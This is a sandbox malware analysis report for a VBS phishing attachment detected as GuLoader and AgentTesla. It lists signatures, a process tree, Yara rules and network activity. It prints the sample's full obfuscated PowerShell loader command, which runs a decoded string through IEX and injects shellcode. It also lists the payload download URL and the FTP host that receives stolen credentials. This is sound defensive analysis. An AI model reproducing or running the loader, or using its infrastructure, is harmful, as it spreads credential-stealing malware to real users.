Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-09784893 xlsx.vbs

Overview

General Information

Sample Name:PO-09784893 xlsx.vbs
Analysis ID:755440
MD5:bfa859d9ad7b23d3606ea13f525065a7
SHA1:a1b3e395dc20bcdaa866b953a08a48d0079bace2
SHA256:ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 1232 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 4760 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 416 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuITamBlpLdoChrLutBa(An`"""SegAddFriFr3af2Tr`"""No)Ga]GlpFruFobSclIriLecDo UmscatOuaNytCeiStcfo DieTjxbltMoefurkinSc FliBlnSttSi DoPmatKrVFuiImsSuiNobHelSaeAf(PeiBrnSktSt BjSsnaKutAf,PaiCynIntRo ciAPssPspKoafa,LsiSenbatsl JePRerTajSesTiiUnsTg)su;Ny[HuDSalGalTjIOlmSepAropirRetLe(Vi`"""DeuLesAfeSmrFo3Bu2An`"""pa)Sw]SkpAcuDibinlKriNrcBl TasUntBiaPotAniIncCh CoeFrxPltLoeUnrPenTo HyiTunprtMa jaGPreFotBuMSkeSpsNssBeaMagAieTi(PoiinnautSl TyGTuiChrDi,TriLanHotSt AmSSitTorDoaFa,SkibanRetin PrkBeiInpPrkRoaLalBo,AdiAnnAntGe UlFBeiRerNr)So;Kh[InDHolRilRkIGumrepfloGarIstLa(Pa`"""PekEseSkrArnSaeChlMe3An2ti`"""Ji)Ca]SapCeuCabAflReiTocUn PesCltLiaSetOciDacCh KoeAlxUntPreDerNinCi DiiFonPltFl DuVPoiSarFotHeuOgaThlFeAUnlMolSeoDicRe(TrisknSytDo SevNe1Ko,KaiBanBetNi PrvKn2Bi,HeiBanAmtMo InvSt3Bu,CoiMunMitTr Sivti4To)Tr;Bl[MaDinlDelJuISvmMepKboMirRitVi(Gr`"""DiAToDboVToAMaPMiIHa3Hv2Ho.BrDDeLKaLUn`"""Ru)Am]RgpKauTybVilDaiUncCh TosNetUnaMetUniBrcSe SeeNexEntIneDarBinQu AriStnSttOp RaRDoeTrgLiLOvopsaDadOpKHoeFryFr(SiiPhnSatIn syDZaaHocUnrImyBa,FaiUnnaltFo SpSSatHaoUnrPr,TiiHinPutBu NoONanEscfi)He;Po[noDCelHalBlIStmUnpUnoDarArtGi(Ge`"""SpgundSliMo3Sp2Pa`"""Em)Ti]AlpDiuFabTrlLiiChcGe PosKotHoaCetFliStcSe TreLsxRetAceUrrConBa FoiInnMitTr DdWAeiGedKaePrnfiPTjaSttBlhVe(StiHanTutIs TeOGabBydBauTr)St;Ra}Fj'Al;Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWosAr1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCieNemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUotPsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBaeSulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft`$FoVToiJalKrlfeiPagPesRetAreKnsSy Ne=Tv Rl[VoSCyyKnsadtLeeAdmSk.OuCAdoUnnHevnoeFirNotSi]Ov:Ac:RaFMurZeoKmmevBBeaNysMueRe6Un4MoSSltRerStiUnnCogKl(Ga`$StNChaGeePrgAuaLotObeFa)Me;Kv[SoSGryBesMatEmeSmmFe.crRInuGrnLetRiiStmdeeIm.KaIFrnAjtFleOprcroBepPrSGaeGrrSnvIniGncOveHosFa.HaMInaVerGosFrhAnaAllBl]Fr:El:WaCVaoVapCoyir(Un`$HiVTriSilSwlShiSagCosartFreSlsCa,Br ca0Gs,Ru Be Cr`$HeTRehBewBiaWorFltUnnOveUnsHysVa3Ug,By Zy`$BiVSpiSalGrlKoiSvgKrsLitUdeDrsAd.HecMioPouAjnCttHa)Ov;Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPimFrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3Bi,be Kr0De)rh#Te;""";Function Thwartness4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); } $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 4292 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 7836 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
PO-09784893 xlsx.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa39:$s1: .CreateObject("WScript.Shell")
  • 0x3fe57:$p1: powershell.exe
  • 0x4d288:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
00000005.00000002.2688111783.0000000009190000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000B.00000000.2410724852.0000000000B00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: powershell.exe PID: 416INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x289c:$b2: ::FromBase64String(
          • 0x14ef1e:$b2: ::FromBase64String(
          • 0x17a50f:$b2: ::FromBase64String(
          • 0x3712a:$s1: -join
          • 0x378df:$s1: -join
          • 0x1394bb:$s1: -join
          • 0x13b34b:$s1: -join
          • 0x165625:$s1: -join
          • 0x1d371a:$s1: -join
          • 0x1e07ef:$s1: -join
          • 0x1e3bc1:$s1: -join
          • 0x1e4273:$s1: -join
          • 0x1e5d64:$s1: -join
          • 0x1e7f6a:$s1: -join
          • 0x1e8791:$s1: -join
          • 0x1e9001:$s1: -join
          • 0x1e973c:$s1: -join
          • 0x1e976e:$s1: -join
          • 0x1e97b6:$s1: -join
          • 0x1e97d5:$s1: -join
          • 0x1ea025:$s1: -join
          Click to see the 2 entries

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflE
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
          Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Binary string: $Pl8C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.pdb source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp
          Source: Joe Sandbox ViewIP Address: 185.31.121.136 185.31.121.136
          Source: global trafficHTTP traffic detected: GET /wp-admin/includes/yyXYRRIJkuolPn153.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
          Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49819 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.mcmprint.netnoffice
          Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://OowQOv.com
          Source: CasPol.exe, 0000000B.00000002.6743714275.000000001C260000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.6719479887.0000000000E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b3solutionscws.com/wp-admin/includes/yyXYRRIJkuolPn153.fla
          Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hWFpSCunbgPMSZDs.net
          Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBPl
          Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000005.00000002.2622363726.0000000004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknownDNS traffic detected: queries for: b3solutionscws.com
          Source: global trafficHTTP traffic detected: GET /wp-admin/includes/yyXYRRIJkuolPn153.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa 